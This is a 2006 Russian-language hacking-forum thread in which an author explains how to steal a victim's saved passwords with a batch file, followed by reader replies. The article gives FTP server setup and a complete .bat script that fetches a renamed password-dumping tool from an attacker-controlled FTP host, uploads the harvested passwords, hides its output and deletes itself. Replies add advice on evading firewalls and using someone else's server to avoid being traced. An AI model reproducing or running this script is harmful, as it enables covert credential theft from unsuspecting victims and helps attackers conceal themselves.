Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Воровство паролей через bat файл. (https://forum.antichat.xyz/showthread.php?t=25261)

modest 12.10.2006 13:28

Воровство паролей через bat файл.
 
Всем привет!
В этой статье вы узнаете, как можно получить пароли жертв через bat файл, и как от этого защитится, если уже знаете, можете не читать.
Начнем!
;)

Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь. Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.exe” (PassView Pro).
Дальше нам надо скачать ftp сервер, я возьму “Pablo’s ftp server”, на мой взгляд он простенький, и полностью подходит для этого дела. Качаем его отсюда, у меня он будет находится в “c:\ftp”. Теперь надо настроить его. Запускаем ftpserver.exe, жмем вкладку “server”, выбираем там “User Account Wizard”. В поле “account name” пишем “ftpuser”, жмем “далее”. В поле “password” напишем “12345” и повторим это в поле “confirm password”, теперь жмем “далее”. Теперь нам надо указать папку, которая будет открыта этому пользователю, я создавал в диске c:\, указываю “c:\temp”, жмём “далее”. Отмечаем галочки “Allow Download”, “Allow Upload”, жмем далее и готово! Все, настройка фтп сервера закончена! Теперь нам понадобится текстовый редактор, он у нас уже открыт. Пишем в него:

Код:

@echo off
Echo open xxx.xxx.xxx.xxx>go.txt&&echo ftpuser>>go.txt&&echo 12345>>go.txt&&echo get passexport.exe>>go.txt&&echo bye>>go.txt
Echo open xxx.xxx.xxx.xxx>send.txt&&echo ftpuser>>send.txt&&echo 12345>>send.txt&&echo send pass.txt>>send.txt&&echo bye>>send.txt
ftp -s:go.txt > nul
passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat

Теперь я объясню каждую делать этого кода.
xxx.xxx.xxx.xxx - IP фтп сервера
Echo – записывает текст
> - указывает какой файл создать
>> - в какой дописать
&& - тоже самое, что запитая в русском языке =)
ftp – фтп клиент встроенный в windows
-s: - открывает сценарий
del go.txt send.txt passexport.txt pass.txt name.bat - это строчка указывает, какие файлы удалить после запуска файла, она удалит все за собой, в том числе и себя. (измените name.bat на свое название, когда вы сохраните в .bat файл)
> nul – скрывает записи от пользовательских глаз

Сохраняем в name.bat и даем жертве! после того как жертва запустит этот файл, к вам в папку, которую вы указали для пользователя, в настройках фтп, прейдет текстовый файл с паролями(в статье я указывал c:\temp).

Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.
Статья предназначена для ознакомительных целей, за последствия не отвечаю!

Авторские права принадлежат modest, 12.10.06. (modest@xaker.ru)

Digimortal 12.10.2006 13:55

Цитата:

Сообщение от modest
Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.

отличный способ ниче не скажешь - более менее разумный чел сразу узнает твой ip :)..
это прокатит только с лохами про файрволл ниче не слыхавшими..

Undernative 12.10.2006 13:56

Хм.....не проверял ,но молодец ! ;)

modest 12.10.2006 14:10

Цитата:

Сообщение от Digimortal
отличный способ ниче не скажешь - более менее разумный чел сразу узнает твой ip :)..
это прокатит только с лохами про файрволл ниче не слыхавшими..

А ты укажи не свой ип=) чужой фтп сервер.
Я проверял с включенным firewall, ниче не "вякал".

cardons 12.10.2006 14:21

Это вигня полная на самом деле.Тока полные ламеры могут сохранять свои пароли.

KPOT_f!nd 12.10.2006 14:42

К примеру файрволл OUTPOST попалит и выдаст окно для того что спросить разрешиние на конект с xxxx.ru! Попройбу у себе на компе! Если у тебя OUTPOST

Digimortal 12.10.2006 14:44

Цитата:

Сообщение от modest
А ты укажи не свой ип=) чужой фтп сервер.

так уже лучше =), надо было про это написать в статье, представь, сколько начинающих может спалиться, последуй они описанным в твоей статье действиям =)..
Цитата:

Сообщение от modest
Я проверял с включенным firewall, ниче не "вякал".

ну это у тебя так настроено, по хорошему, не стоит разрешать встроенному виндовому фтп-клиенту свободно выходить в сеть, если это действительно не необходимо (а кому это необходимо, а?)..

Diablo 12.10.2006 15:05

Я наверно тупой :)
А какие пароли он тырит ? От чего ?

guest3297 12.10.2006 15:06

Стучал недавно один мyдак с такой фигней... зашел на фтп там сайт какой то "hack team" был...

cardons 12.10.2006 16:09

Цитата:

Сообщение от Diablo
Я наверно тупой :)
А какие пароли он тырит ? От чего ?

От инета


Время: 21:26